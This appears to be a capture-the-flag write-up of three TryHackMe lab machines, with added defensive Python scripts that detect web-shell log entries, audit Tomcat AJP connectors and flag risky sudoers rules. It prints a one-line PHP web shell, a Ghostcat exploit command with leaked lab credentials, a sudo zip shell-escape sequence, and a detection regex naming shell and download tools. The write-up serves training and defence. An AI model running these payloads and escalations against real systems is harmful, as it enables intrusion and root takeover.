TryHackMe - Easy Machines (LazyAdmin, Wgel CTF, Tomghost)

LazyAdmin

    # nmap options used in these writeups: -F scans the 100 most common ports,
    # -sn does host discovery only (no port scan), -sV probes service versions.
    # Note: -sn suppresses the port scan, so -sV has no effect when combined with it;
    # run -sn alone for discovery and -F -sV for a fast version scan.
    nmap -F -sn -sV

Enumeration

    ❯ nmap 10.10.136.56 -p80 -sV
    ...
    PORT   STATE SERVICE VERSION
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

    dirb http://10.10.136.56/

  • Username: manager (found in an SQL file)
  • Password: Password123 (cracked via CrackStation)

Exploitation

  1. Upload a PHP web shell that passes the cmd query parameter to system(): <?php system($_GET["cmd"]);?>
  2. Check sudo privileges: sudo -l
  3. Exploit backup.pl (listed by sudo -l), which calls /etc/copy.sh.
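The one-line PHP web shell in step 1 leaves a distinctive trace in the Apache access log: a request to a PHP file with a query parameter whose value is an operating-system command. The following Python script is an added example, not part of the original writeup, that parses combined-format log lines and flags such requests. The log lines, the SUSPECT_PARAMS set and the command regex are constructed assumptions for illustration.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-log lines (assumption: illustrative, not from the room).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /content/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:07 +0000] "GET /content/inc/shell.php?cmd=id HTTP/1.1" 200 87 "-" "curl/7.68.0"
10.0.0.9 - - [10/Mar/2024:12:00:09 +0000] "GET /content/inc/shell.php?cmd=uname%20-a HTTP/1.1" 200 133 "-" "curl/7.68.0"
10.0.0.5 - - [10/Mar/2024:12:00:15 +0000] "GET /content/search.php?q=admin HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names typical of one-line PHP command shells (assumption: starter set).
SUSPECT_PARAMS = {"cmd", "c", "exec", "command"}
# Values that look like an OS command rather than application data (assumption: starter list).
SHELL_VALUE_RE = re.compile(r"^(?:id|whoami|uname|ls|cat|wget|curl|nc|bash|sh|python3?)\b")


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlparse(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query)  # parse_qs percent-decodes the values
    return rec


def find_webshell_hits(log_text):
    """Return one hit per request whose query string looks like web-shell command execution."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for param, values in rec["query"].items():
            for value in values:
                if param.lower() in SUSPECT_PARAMS or SHELL_VALUE_RE.match(value.strip()):
                    hits.append({
                        "ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                        "param": param, "value": value, "status": rec["status"],
                    })
    return hits


if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['path']} {hit['param']}={hit['value']!r} -> {hit['status']}")
```

On the constructed sample the two shell.php requests are flagged and the ordinary search request is not; in practice the parameter set and command list should be tuned against the application's real traffic, and the hits correlated with file-upload events on the same host.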

Wgel CTF

Enumeration

    ❯ nmap 10.10.120.10 -sV -p80
    ...
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

  • Found username jessie in HTML comment.
  • Discovered .ssh/id_rsa via directory brute-forcing.

Exploitation

    ssh -i id_rsa jessie@10.10.120.10

Privilege Escalation

    jessie@CorpOne:~$ sudo -l
    ...
    (root) NOPASSWD: /usr/bin/wget

Exploit wget to overwrite /etc/sudoers or read sensitive files.


Tomghost

Enumeration

    ❯ nmap 10.10.189.103 -p 8080,8009 -sV
    ...
    8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
    8080/tcp open  http    Apache Tomcat 9.0.30

Exploitation

Exploit Ghostcat (CVE-2020-1938) to read WEB-INF/web.xml:

    ❯ python2 48143.py -f WEB-INF/web.xml -p 8009 10.10.189.103
    ...
    skyfuck:8730281lkjlkjdqlksalks
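Ghostcat works because the AJP connector on 8009 accepts connections from any host without a shared secret. Beyond upgrading Tomcat past 9.0.30 (the fix in 9.0.31 binds AJP to loopback and requires a secret by default), the connector configuration in server.xml is the thing to audit. The script below is an added example, not from the room or from Tomcat itself; the two server.xml fragments are constructed assumptions showing the weak setting beside a hardened one, and the audit reports any AJP connector that is reachable beyond loopback or lacks a secret.

```python
import xml.etree.ElementTree as ET

# Constructed server.xml fragments (assumption: minimal examples, not the room's real config).
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>"""

HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"
               address="127.0.0.1" secretRequired="true" secret="CHANGE-ME-LONG-RANDOM" />
  </Service>
</Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml):
    """Return a list of (port, issue) tuples for every AJP connector in the given server.xml."""
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue  # HTTP connectors are out of scope here
        port = conn.get("port", "?")
        # Tomcat releases before 9.0.31 bind AJP to all interfaces when address is unset.
        address = conn.get("address", "0.0.0.0")
        if address not in LOOPBACK:
            findings.append((port, f"AJP connector reachable on {address}; bind it to loopback or remove it"))
        if conn.get("secretRequired", "true").lower() == "false":
            findings.append((port, 'secretRequired="false" disables the AJP shared secret'))
        elif not conn.get("secret"):
            findings.append((port, "no AJP secret configured; any client reaching the port can speak AJP"))
    return findings


if __name__ == "__main__":
    for label, xml in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp_connectors(xml) or "no findings")
```

If the reverse proxy in front of Tomcat does not actually use AJP, the better fix is to delete the connector entirely; the audit treats a loopback-bound connector with a secret as acceptable because that is the 9.0.31+ default.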

Privilege Escalation

  1. Crack PGP key using gpg2john.
  2. Decrypt credential.pgp to get merlin's password.
  3. Exploit sudo /usr/bin/zip via GTFOBins.

    TF=$(mktemp -u)
    sudo zip $TF /etc/hosts -T -TT 'sh #'
    sudo rm $TF
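The Wgel (wget) and Tomghost (zip) privilege escalations above share one root cause: a NOPASSWD sudo rule for a binary that GTFOBins documents as a shell escape or file read/write primitive. The following Python audit is an added example, not from the rooms or any TryHackMe material, that parses sudoers user-specification lines and flags such rules. The sudoers excerpt and the RISKY_BINARIES subset are constructed assumptions; the full GTFOBins catalogue is the reference to extend it from.

```python
import os
import re

# Constructed sudoers excerpt (assumption: illustrative, not the rooms' real files).
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
jessie  ALL=(root) NOPASSWD: /usr/bin/wget
merlin  ALL=(root) NOPASSWD: /usr/bin/zip
backup  ALL=(root) NOPASSWD: /usr/bin/rsync --archive /srv/data /backup
deploy  ALL=(root) /usr/bin/systemctl restart app.service
"""

# Binaries GTFOBins documents as yielding a shell or arbitrary file access when run as root.
# Assumption: a starter subset, not the complete list.
RISKY_BINARIES = {"wget", "zip", "tar", "vim", "vi", "less", "more", "find", "env",
                  "perl", "python", "python3", "awk", "bash", "sh"}

# user HOST=(runas[:group]) [TAG: ...] command[, command ...]
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Parse user-specification lines; comments, blank lines and Defaults are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        cmds = [c.strip() for c in m["cmds"].split(",") if c.strip()]
        entries.append({"user": m["user"], "runas": m["runas"], "tags": tags, "cmds": cmds})
    return entries


def audit_sudoers(text):
    """Flag rules letting a non-root user run ALL or a risky binary as root; NOPASSWD raises severity."""
    findings = []
    for e in parse_sudoers(text):
        if e["user"] == "root":
            continue
        runas_user = e["runas"].split(":")[0]
        if runas_user not in ("ALL", "root"):
            continue  # cannot reach root through this rule
        nopasswd = "NOPASSWD" in e["tags"]
        for cmd in e["cmds"]:
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL" or binary in RISKY_BINARIES:
                findings.append({
                    "user": e["user"], "command": cmd, "nopasswd": nopasswd,
                    "severity": "high" if nopasswd else "medium",
                })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f['severity']}] {f['user']} may run '{f['command']}' as root"
              f"{' without a password' if f['nopasswd'] else ''}")
```

On the sample, jessie's wget rule and merlin's zip rule are reported as high severity, while the rsync and systemctl rules with fixed arguments are not; the remediation is to drop the rule or replace the broad binary with a wrapper script that takes no user-controlled arguments.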